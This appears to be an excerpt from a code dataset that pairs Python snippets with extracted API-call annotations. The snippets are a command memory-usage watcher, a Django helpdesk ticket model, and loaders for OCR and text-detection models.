time.sleep(self.time_interval)
new_mem = self.add_measure()
if new_mem > max_mem:
max_mem = new_mem
if new_mem < min_mem:
min_mem = new_mem
stdout, stderr = proc.communicate()
sys.stdout.write(stdout.decode())
sys.stderr.write(stderr.decode())
sys.stderr.write(f'Memory consumption: {(max_mem - min_mem)*1e-9:.3f} GB\n')
self.outputfile.flush()
sys.exit(proc.returncode)
def main(args):
parser = argparse.ArgumentParser(description='Monitoring of a command memory consumption')
parser.add_argument('--time_interval', '-t', type=int, default=1,
help='Period of the measures, in seconds')
parser.add_argument('--output', '-o', type=str, default='/tmp/memwatch.csv',
help='Output file for the measures')
parser.add_argument('command', type=str,
help='Command line to execute')
args = parser.parse_args(args)
watcher = Watcher(cmd=args.command.split(), time_interval=args.time_interval, filename=args.output)
watcher.run_and_watch()
if __name__ == '__main__':
main(sys.argv[1:])
|
[
"subprocess.Popen",
"csv.writer",
"argparse.ArgumentParser",
"time.sleep",
"sys.stderr.write",
"datetime.datetime.now",
"sys.exit"
] |
[((1891, 1977), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Monitoring of a command memory consumption"""'}), "(description=\n 'Monitoring of a command memory consumption')\n", (1914, 1977), False, 'import argparse\n'), ((339, 366), 'csv.writer', 'csv.writer', (['self.outputfile'], {}), '(self.outputfile)\n', (349, 366), False, 'import csv\n'), ((1284, 1325), 'subprocess.Popen', 'Popen', (['self.cmd'], {'stdout': 'PIPE', 'stderr': 'PIPE'}), '(self.cmd, stdout=PIPE, stderr=PIPE)\n', (1289, 1325), False, 'from subprocess import Popen, PIPE\n'), ((1717, 1796), 'sys.stderr.write', 'sys.stderr.write', (['f"""Memory consumption: {(max_mem - min_mem) * 1e-09:.3f} GB\n"""'], {}), "(f'Memory consumption: {(max_mem - min_mem) * 1e-09:.3f} GB\\n')\n", (1733, 1796), False, 'import sys\n'), ((1834, 1859), 'sys.exit', 'sys.exit', (['proc.returncode'], {}), '(proc.returncode)\n', (1842, 1859), False, 'import sys\n'), ((1028, 1051), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1049, 1051), False, 'import datetime\n'), ((1373, 1403), 'time.sleep', 'time.sleep', (['self.time_interval'], {}), '(self.time_interval)\n', (1383, 1403), False, 'import time\n')]
|
from django.db import models
# Create your models here.
class ticket(models.Model):
    """A helpdesk ticket: which tech handled what issue, for whom, and where."""

    # Stamped once when the row is created and never updated afterwards.
    timestamp = models.DateField(auto_now_add=True, auto_now=False)
    tech = models.CharField(max_length=50)
    site = models.CharField(max_length=50)
    user = models.CharField(max_length=50)
    issue = models.CharField(max_length=200)
    # Explicit auto-incrementing primary key.
    tickid = models.AutoField(primary_key=True)
    complete = models.BooleanField()
    # Requested action — optional free text.
    reqact = models.CharField(max_length=200, blank=True)

    def __unicode__(self):
        # Python 2 string representation (shown e.g. in the Django admin).
        return self.site
|
[
"django.db.models.DateField",
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.AutoField"
] |
[((101, 152), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)', 'auto_now': '(False)'}), '(auto_now_add=True, auto_now=False)\n', (117, 152), False, 'from django.db import models\n'), ((164, 195), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (180, 195), False, 'from django.db import models\n'), ((208, 239), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (224, 239), False, 'from django.db import models\n'), ((252, 283), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (268, 283), False, 'from django.db import models\n'), ((297, 329), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (313, 329), False, 'from django.db import models\n'), ((344, 378), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (360, 378), False, 'from django.db import models\n'), ((394, 415), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (413, 415), False, 'from django.db import models\n'), ((429, 473), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'blank': '(True)'}), '(max_length=200, blank=True)\n', (445, 473), False, 'from django.db import models\n')]
|
import torch
from vietocr.tool.config import Cfg
from vietocr.tool.predictor import Predictor
import configs as cf
from models.saliency.u2net import U2NETP
from backend.text_detect.craft_utils import get_detector
def load_text_detect():
    """Return a CRAFT text detector built from the configured weights and device."""
    return get_detector(cf.text_detection_weights_path, cf.device)
def load_saliency():
    """Load the U2NETP saliency network onto cf.device in eval mode."""
    model = U2NETP(3, 1).to(cf.device)
    # Restore the trained weights, remapping storage to the configured device.
    state = torch.load(cf.saliency_weight_path, map_location=cf.device)
    model.load_state_dict(state)
    model.eval()
    return model
def load_text_recognize():
    """Build a VietOCR Predictor from the named 'vgg_seq2seq' config.

    Pretrained CNN download is skipped and beam search is disabled;
    inference runs on cf.device.
    """
    cfg = Cfg.load_config_from_name("vgg_seq2seq")
    cfg["cnn"]["pretrained"] = False
    cfg["device"] = cf.device
    cfg["predictor"]["beamsearch"] = False
    return Predictor(cfg)
|
[
"vietocr.tool.predictor.Predictor",
"torch.load",
"vietocr.tool.config.Cfg.load_config_from_name",
"backend.text_detect.craft_utils.get_detector",
"models.saliency.u2net.U2NETP"
] |
[((260, 315), 'backend.text_detect.craft_utils.get_detector', 'get_detector', (['cf.text_detection_weights_path', 'cf.device'], {}), '(cf.text_detection_weights_path, cf.device)\n', (272, 315), False, 'from backend.text_detect.craft_utils import get_detector\n'), ((374, 386), 'models.saliency.u2net.U2NETP', 'U2NETP', (['(3)', '(1)'], {}), '(3, 1)\n', (380, 386), False, 'from models.saliency.u2net import U2NETP\n'), ((572, 612), 'vietocr.tool.config.Cfg.load_config_from_name', 'Cfg.load_config_from_name', (['"""vgg_seq2seq"""'], {}), "('vgg_seq2seq')\n", (597, 612), False, 'from vietocr.tool.config import Cfg\n'), ((747, 764), 'vietocr.tool.predictor.Predictor', 'Predictor', (['config'], {}), '(config)\n', (756, 764), False, 'from vietocr.tool.predictor import Predictor\n'), ((439, 498), 'torch.load', 'torch.load', (['cf.saliency_weight_path'], {'map_location': 'cf.device'}), '(cf.saliency_weight_path, map_location=cf.device)\n', (449, 498), False, 'import torch\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.